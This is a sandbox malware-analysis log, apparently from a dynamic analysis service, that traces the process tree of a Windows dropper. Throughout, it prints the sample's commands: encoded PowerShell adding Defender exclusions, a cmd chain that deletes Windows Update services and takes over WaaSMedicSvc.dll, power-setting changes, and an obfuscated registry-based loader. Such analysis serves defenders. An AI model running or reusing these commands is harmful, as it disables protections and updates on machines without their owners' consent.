Token: SeIncreaseQuotaPrivilege | 3864 | powershell.exe
Token: SeSecurityPrivilege | 3864 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3864 | powershell.exe
Token: SeLoadDriverPrivilege | 3864 | powershell.exe
Token: SeSystemProfilePrivilege | 3864 | powershell.exe
Token: SeSystemtimePrivilege | 3864 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3864 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3864 | powershell.exe
Token: SeCreatePagefilePrivilege | 3864 | powershell.exe
Token: SeBackupPrivilege | 3864 | powershell.exe
Token: SeRestorePrivilege | 3864 | powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs
pid | Process
4408 | Conhost.exe
4280 | Conhost.exe
3124 | Conhost.exe

Suspicious use of UnmapMainImage 1 IoCs
pid | Process
2564 | svchost.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 4944 wrote to memory of 2448 | 4944 | d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe | 83
PID 4944 wrote to memory of 2448 | 4944 | d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe | 83
PID 4944 wrote to memory of 2448 | 4944 | d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe | 83
PID 4944 wrote to memory of 2448 | 4944 | d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe | 83
PID 4944 wrote to memory of 2448 | 4944 | d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe | 83
PID 2448 wrote to memory of 4352 | 2448 | AppLaunch.exe | 90
PID 2448 wrote to memory of 4352 | 2448 | AppLaunch.exe | 90
PID 4352 wrote to memory of 2424 | 4352 | Zd60uZ7J.exe | 93
PID 4352 wrote to memory of 2424 | 4352 | Zd60uZ7J.exe | 93
PID 4352 wrote to memory of 2424 | 4352 | Zd60uZ7J.exe | 93
PID 2424 wrote to memory of 612 | 2424 | conhost.exe | 94
PID 2424 wrote to memory of 612 | 2424 | conhost.exe | 94
PID 2424 wrote to memory of 3620 | 2424 | conhost.exe | 96
PID 2424 wrote to memory of 3620 | 2424 | conhost.exe | 96
PID 2424 wrote to memory of 4780 | 2424 | conhost.exe | 98
PID 2424 wrote to memory of 4780 | 2424 | conhost.exe | 98
PID 3620 wrote to memory of 2656 | 3620 | cmd.exe | 101
PID 3620 wrote to memory of 2656 | 3620 | cmd.exe | 101
PID 4780 wrote to memory of 1256 | 4780 | cmd.exe | 100
PID 4780 wrote to memory of 1256 | 4780 | cmd.exe | 100
PID 2424 wrote to memory of 3864 | 2424 | conhost.exe | 102
PID 2424 wrote to memory of 3864 | 2424 | conhost.exe | 102
PID 3620 wrote to memory of 4184 | 3620 | cmd.exe | 104
PID 3620 wrote to memory of 4184 | 3620 | cmd.exe | 104
PID 4780 wrote to memory of 2192 | 4780 | cmd.exe | 105
PID 4780 wrote to memory of 2192 | 4780 | cmd.exe | 105
PID 4780 wrote to memory of 3676 | 4780 | cmd.exe | 106
PID 4780 wrote to memory of 3676 | 4780 | cmd.exe | 106
PID 3620 wrote to memory of 1904 | 3620 | cmd.exe | 107
PID 3620 wrote to memory of 1904 | 3620 | cmd.exe | 107
PID 4780 wrote to memory of 1068 | 4780 | cmd.exe | 108
PID 4780 wrote to memory of 1068 | 4780 | cmd.exe | 108
PID 3620 wrote to memory of 4584 | 3620 | cmd.exe | 109
PID 3620 wrote to memory of 4584 | 3620 | cmd.exe | 109
PID 3620 wrote to memory of 4516 | 3620 | cmd.exe | 110
PID 3620 wrote to memory of 4516 | 3620 | cmd.exe | 110
PID 3620 wrote to memory of 2032 | 3620 | cmd.exe | 111
PID 3620 wrote to memory of 2032 | 3620 | cmd.exe | 111
PID 3620 wrote to memory of 1136 | 3620 | cmd.exe | 112
PID 3620 wrote to memory of 1136 | 3620 | cmd.exe | 112
PID 3620 wrote to memory of 3992 | 3620 | cmd.exe | 113
PID 3620 wrote to memory of 3992 | 3620 | cmd.exe | 113
PID 3620 wrote to memory of 4620 | 3620 | cmd.exe | 114
PID 3620 wrote to memory of 4620 | 3620 | cmd.exe | 114
PID 3620 wrote to memory of 2500 | 3620 | cmd.exe | 115
PID 3620 wrote to memory of 2500 | 3620 | cmd.exe | 115
PID 3620 wrote to memory of 3484 | 3620 | cmd.exe | 116
PID 3620 wrote to memory of 3484 | 3620 | cmd.exe | 116
PID 3620 wrote to memory of 4964 | 3620 | cmd.exe | 117
PID 3620 wrote to memory of 4964 | 3620 | cmd.exe | 117
PID 2424 wrote to memory of 2252 | 2424 | conhost.exe | 118
PID 2424 wrote to memory of 2252 | 2424 | conhost.exe | 118
PID 2424 wrote to memory of 2252 | 2424 | conhost.exe | 118
PID 2424 wrote to memory of 3912 | 2424 | conhost.exe | 119
PID 2424 wrote to memory of 3912 | 2424 | conhost.exe | 119
PID 2424 wrote to memory of 864 | 2424 | conhost.exe | 121
PID 2424 wrote to memory of 864 | 2424 | conhost.exe | 121
PID 3912 wrote to memory of 736 | 3912 | cmd.exe | 123
PID 3912 wrote to memory of 736 | 3912 | cmd.exe | 123
PID 864 wrote to memory of 4908 | 864 | cmd.exe | 124
PID 864 wrote to memory of 4908 | 864 | cmd.exe | 124
PID 3620 wrote to memory of 3888 | 3620 | cmd.exe | 130
PID 3620 wrote to memory of 3888 | 3620 | cmd.exe | 130
PID 3620 wrote to memory of 1384 | 3620 | cmd.exe | 131
Processes
(The leading number is the nesting depth in the process tree; each entry lists the image path, the command line, any signatures matched by that process, and its PID.)

1  C:\Windows\system32\lsass.exe
   command line: C:\Windows\system32\lsass.exe
   PID:664

1  C:\Windows\system32\winlogon.exe
   command line: winlogon.exe
   PID:580

   2  C:\Windows\system32\dwm.exe
      command line: "dwm.exe"
      PID:328

   2  C:\Windows\System32\dllhost.exe
      command line: C:\Windows\System32\dllhost.exe /Processid:{4cb8499a-f52c-42b6-a4a0-d3c8f0b5d019}
      - Suspicious behavior: EnumeratesProcesses
      PID:4060

   2  C:\Windows\SysWOW64\dllhost.exe
      command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{6aa651d5-cd5c-48bd-80b3-141f653b4a55}
      PID:4264

1  C:\Windows\system32\svchost.exe
   command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
   PID:440

1  C:\Windows\System32\svchost.exe
   command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
   PID:688

1  C:\Windows\system32\svchost.exe
   command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
   PID:1092

   2  C:\Windows\system32\taskhostw.exe
      command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
      PID:2436

   2  C:\Program Files\Platform\Defender\update.exe
      command line: "C:\Program Files\Platform\Defender\update.exe"
      - Executes dropped EXE
      PID:2444

      3  C:\Windows\System32\conhost.exe
         command line: "C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"
         - Drops file in Drivers directory
         - Drops file in System32 directory
         - Suspicious use of SetThreadContext
         - Drops file in Program Files directory
         - Modifies data under HKEY_USERS
         PID:908

         4  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
            decoded (base64 of UTF-16LE): <#gqly#> Add-MpPreference <#kdj#> -ExclusionPath <#la#> @( <#fhz#> $env:UserProfile, <#gfth#> $env:ProgramFiles) <#ynbe#> -Force <#ao#>
            The <# ... #> block comments are filler; the effective command adds Defender exclusions for the user profile and Program Files directories.
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
            PID:1864

            5  C:\Windows\System32\Conhost.exe
               command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               PID:972

         4  C:\Windows\System32\cmd.exe
            command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
            PID:1320
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:4408
-
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:3632
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:736
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:4544
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:4904
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:4668
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
PID:4152
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
PID:3388
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
PID:3712
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
PID:4572
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
PID:2732
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4764
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4996
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
PID:2640
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
PID:3100
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:5088
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:2260
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵PID:2432
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵PID:1576
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵PID:720
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵PID:3500
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵PID:2880
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵PID:3616
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵PID:1332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵PID:4808
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:4280
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵PID:1684
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵PID:4908
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵PID:2116
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵PID:4164
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3104 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:3124
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "epzggvhm"4⤵PID:3080
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe zryhtmslhfgrpc1 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⤵
- Executes dropped EXE
PID:1496
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1140 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4228
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1336
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3436
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:5068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:5096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4656
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:5044
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2168
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4164
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4164 -s 4642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4668
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3748
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3276
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3276 -s 8802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2160
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3092
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3048
-
C:\Users\Admin\AppData\Local\Temp\d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe"C:\Users\Admin\AppData\Local\Temp\d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3472
-
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
PID:2656
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:4184
-
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
PID:1904
-
-
C:\Windows\system32\sc.exesc stop bits7⤵
- Launches sc.exe
PID:4584
-
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
PID:4516
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f7⤵
- Modifies registry key
PID:2032
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f7⤵
- Modifies registry key
PID:1136
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f7⤵
- Modifies security service
- Modifies registry key
PID:3992
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f7⤵
- Modifies registry key
PID:4620
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f7⤵
- Modifies registry key
PID:2500
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4964
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
- Modifies registry key
PID:3888
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
PID:1384
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
PID:2452
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
PID:1064
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE7⤵PID:1940
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE7⤵PID:1880
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE7⤵PID:4644
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE7⤵PID:3700
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE7⤵PID:4528
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE7⤵PID:3120
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵PID:4712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
